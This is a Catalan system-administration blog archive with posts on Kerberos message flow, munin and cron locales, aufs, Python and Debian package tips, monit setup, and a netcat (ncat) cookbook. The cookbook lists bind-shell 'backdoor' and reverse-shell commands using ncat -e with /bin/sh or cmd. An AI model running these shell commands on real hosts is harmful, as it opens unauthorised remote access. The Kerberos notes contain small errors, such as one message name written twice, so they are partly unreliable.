Tag: system-administrator

Podcast 2×06: Com funciona Kerberos? autenticació i autorització (AA)

2010/07/27 No hi ha comentaris

Reading time: 4 – 6 minutes

El podcast

[display_podcast]

Notes

Estàndard RFC1510 per l’autenticació, destaquen les funcionalitats de:

autenticació mutua
temps de connexió ràpids (session tickets)
delegació (autenticació recursiva entre serveis)

Esquemes

Simplifiació del funcionament

Hi ha 6 tipus de missatges (5 obligatoris + 1 opcional), agrupats en 3 su-protocols:

AS (Authentication Service) – es produeix durant el procés de “login” i li permet al client poder demanar un ticket per accedir als recursos (TGT)
- KRB_AS_REP
  - Client principal name.
  - Timestamp.
  - Kerberos target principle name (realm).
  - Requested lifetime.
- KRB_AS_REP
  - La primera part va xifrada usant la clau d’usuari, conté:
    - User-TGS key (generated by the KDC).
    - Kerberos target principle name (realm).
    - Ticket lifetime.
  - La segona part és el TGT, va xifrat usant la clau TGS generada pel KDC només els servidor la poden obrir, malgrat això s’enmagatzema en el client i conté:
    - Client principal name.
    - Ticket lifetime.
    - KDC timestamp.
    - User-TGS key (which is not retained by the KDC, but its presence within the TGT means it is available when required).
    - Client IP address (taken from the initial KRB_AS_REQ).
TGS (Ticket Granting Service) – a través del TGT el client poy demanar un “service ticket” (ST) necessari per poder accedir a un servei. El TGT té un funcionament semblant al d’un password (expira amb el temps i no requereix password), el ST obtingut seria semblant a un visat d’accés a un país.
- KRB_TGS_REQ
  - Service principal name.
  - Requested lifetime.
  - TGT (still encrypted with the TGS key).
  - Authenticator (encrypted with the user-TGS key and containing a client timestamp) – The authenticator guarantees that the request originated from the client.
- KRB_TGS_REP
  - La primera part va xifrada amb la clau TGS de l’usuari (el KDC l’extreu del TGT) i conté:
    - Service principal name.
    - Ticket lifetime.
    - User service key (encrypted with a user-TGS session key, generated by the KDC).
  - Part dos, és el “service ticket” (ST). Xifrat usant la clau del servei TGS. Conté:
  - - User service key (encrypted with a user-TGS session key, generated by the KDC).
    - Client principal name.
    - Ticket lifetime.
    - KDC timestamp.
    - Client IP address.
Client/Server (AP) Exchange – per accedir a un servei el client envia al servei un KRB_AP_REQ amb el ST obtingut. El servei pot o no contestar la petició, a vegades, el servei directament comença la seva sessió.
- KRB_AP_REQ
  - ST xifrat amb la clau TGS del servei
  - Authenticator – encrypted with the user service key
- KRB_AP_REP

Característiques

‘Realm‘ es defineix com un domini d’aministració
Tots els servidors i participants en les transaccions pertanyen al mateix ‘Realm’
Tots els missatges viatgen xifrats usant un codi simètric (no-PKI)
La “user key” es genera a partir del “logon password”
La “host key” es genera quan el “host” s’uneix al ‘Realm’
Si un client vol accedir a un servei i no ha fet el TGS pot enviar el TGT en el “AP exchange” i el servei farà la gestió amb el KDC de forma transparent.
Important recordar que:
només el KDC pot llegir el TGT
només el servei pot llegir el ST

Glossari d’acrònims

KDC: Key Distribution Center
AS: Authentication Service
TGS: Ticket Granting Service
SS: Service Server

Referències:

Error coneguts

Degut a un error el podcast 2×05 no exiteix. Sento l’error!

Notes sobre Munin i Crontab, problemes amb locales

2010/07/14 1 comentari

Reading time: 1 – 2 minutes

Resum de notes interessants que acabo de descobrir sobre: munin, crontab i locales. Tot plegat corrent amb Ubuntu.

crontab, té diversos fitxers de configuració a /etc/cron.d la sintaxis d’aquests és la mateixa que /etc/crontab
els fitxers que hi ha a /etc/cron.d sovint pertanyen a serveis que necessiten executar ordres periódicament
al llençar munin des de dintre d’aquest directori es generaben correus d’error del crontab, queixant-se de problemes amb les locales
dins el fitxer /etc/cron.d/munin podem declarar les locales i així no se’ns tornarà a donar el problema
si volem sobrecarregar on s’han d’enviar els correu d’error de cron en un dels fitxers que hi ha /etc/cron.d podem declarar la variable MAILTO=user@domain.tld dins el propi fitxer

netcat – cookbook

2010/05/31 No hi ha comentaris

Reading time: 2 – 3 minutes

client TCP, en aquest cas HTTP

C:\client>ncat google.com 80
GET / HTTP/1.1

client telnet:

C:\client>ncat -t 192.168.1.1 23

simula un servidor TCP/HTTP molt simple:

C:\server>ncat -l 127.0.0.1 80 < stuff.txt
C:\client>ncat localhost 80

C:\server>ncat -l --keep-open 80 < stuff.txt
C:\client>ncat localhost 80

servidor UDP:

C:\server>ncat -l 74 --udp
C:\client>ncat --udp localhost 74 < stuff.txt

es pot especificar el port i IP origen a usar:

C:\client>ncat www.irongeek.com 80 -p 80 -s 127.0.0.1
C:\client>ncat www.irongeek.com 80 -p 80 -s 192.168.1.1

interconnecta clients, ‘proxy-tcp’

C:\server>ncat -l 74
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

C:\server>ncat -l 74 --broker
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

servidor de ‘chat’ molt simple

C:\server>ncat -l 74 --chat
C:\client1>ncat localhost 74
C:\client2>ncat localhost 74

client TCP+SSL:

C:\client>ncat gmail.google.com 443 --ssl
GET / HTTP/1.1

transmissió de fitxers via TCP+SSL:

C:\server>ncat.exe -l --ssl 74 --send-only < ncat.exe
C:\client>ncat localhost 74 --ssl > out2.exe
(ends self)

C:\client>ncat --ssl -vvv -l > newfile
C:\server>ncat -v --send-only --ssl localhost < ncat.exe
(Good for getting around NAT)

proxy molt simple:

C:\ncat>ncat -l 8080 --proxy-type http --proxy-auth adc:test --ssl

shell amb backdoor:

Linux:

ncat -l 23 -e /bin/sh
C:\server>ncat 192.168.159.128 23

Windows:

C:\server>ncat -l 23 -e cmd
ncat 192.168.159.129 23

Reverse Shell (aka: Shovel Shell)

C:\server>ncat -l 74
C:\client>ncat 192.168.159.128 74 -e cmd

netcat relay

C:\ncat>ncat -l localhost 80 --sh-exec "ncat google.com 80 -o text.txt -x hex.txt"

Aufs – la evolució del unionfs

2010/05/31 No hi ha comentaris

Reading time: 2 – 2 minutes

En les properes setamenes hauré de tornar-me a posar les piles amb els sistemes de fitxers COW(Copy-On-Write), ja havia jugat molt amb unionfs per tal de montar un player linux de digital signage fa uns 2 anys. Però ara estic fent una integració amb MeeGo que porta per defecte el sistema de fitxers BRTFS el qual presenta moltíssimes diferencies en comparació a un sistema de fitxers amb journaling normal com podria ser ext3 i ext4.

La qüestió és que em cal intentar assegurar el bon funcionament d’un sistema operatiu a cada arrencada i havia pensat que potser això podia ser una bona idea, bé ja aniré explicant els resultats del experiments quan toquin. Ara només volia avançar-vos algunes de les funcionalitats i millores que suposa aufs respecte unionfs.

permet unir diferents directoris en un directori virtual nou, a cada directori se l’anomenarà una ‘branch’
a cada ‘branch’ li podem especificar una ‘flag’ diferent: ‘readonly’, ‘readwrite’ i ‘whiteout-able’
gràcies a al nou directori virtual podem simular la capacitat de modificar, afegir i borrar elements en un directori de només lectura
suporta la capacitat d’afegir/treure ‘branch’ d’un directori virtual en calent

La llista de funcionalitats és força més llarga però el més important és que el nou aufs és molt més ràpid i confiable que el unionfs.

dues versions de python en un host

2010/04/21 1 comentari

Reading time: < 1 minute A vegades cal fer algún invent extrany amb el python, com per exemple, el haver de tenir dues versions instal·lades. Sovint la nostre distribució ja portarà una versió del mateix i a més moltes eines de les distribucions acostumen a anar lligades a aquesta versió que millor no malmetre. Cookbook d'ordres per instal·lar un python 2.6.5 a més del 2.4.3 que ja portava el host:

cd /var/tmp
wget http://python.org/ftp/python/2.6.5/Python-2.6.5.tar.bz2
tar xvfj Python-2.6.5.tar.bz2
cd Python-2.6.5
./configure –prefix=/usr
make
make altinstall

si ara fem:

# python -V
Python 2.4.3
# python2.4 -V
Python 2.4.3
# python2.6 -V
Python 2.6.5

debian/ubuntu: buscant quin paquet conté un fitxer

2010/02/12 2 comentaris

Reading time: < 1 minute Referència ràpida per saber quin és el paquet en una debian/ubuntu que conté un fitxer. La típica funcionalitat que mai recordes quan et cal: Paquets instal·lats:

dpkg –search /path/fitxer

Fitxers de paquets no instal·lats:

# cal la utilitat apt-file
apt-get install apt-file
apt-file update
apt-file search fitxer

Ubuntu Hardy (8.04) i monit 4.10.1

2009/09/09 1 comentari

Reading time: 1 – 2 minutes

El paquet .deb de la versió 4.10.1 del monit no esta disponible per Ubuntu Hardy (v.8.04) el paquet més nou disponible és el 4.8 el problema més greu que suposa això és que no podem usar com servidor de notificacions servidors SMTP sense SSL, per exemple, no es pot usar smtp.gmail.com (gmail.com).

Si voleu instal·lar el paquet 8.10.1 el que s’ha de fer és:

cd /var/tmp
wget http://es.archive.ubuntu.com/ubuntu/pool/universe/m/monit/monit_4.10.1-3_i386.deb
sudo dpkg -i monit_4.10.1-3_i386.deb
monit -V

i veurem l’esperat:

This is monit version 4.10.1
Copyright (C) 2000-2007 by the monit project group. All Rights Reserved.

Llista de mirrors pel paquet.

En cas de voler enviar els correus a gmail la configuració seria algo així:

set mailserver smtp.gmail.com port 587
    username [user]@gmail.com password [pass]
    using TLSV1
    with TIMEOUT 20 seconds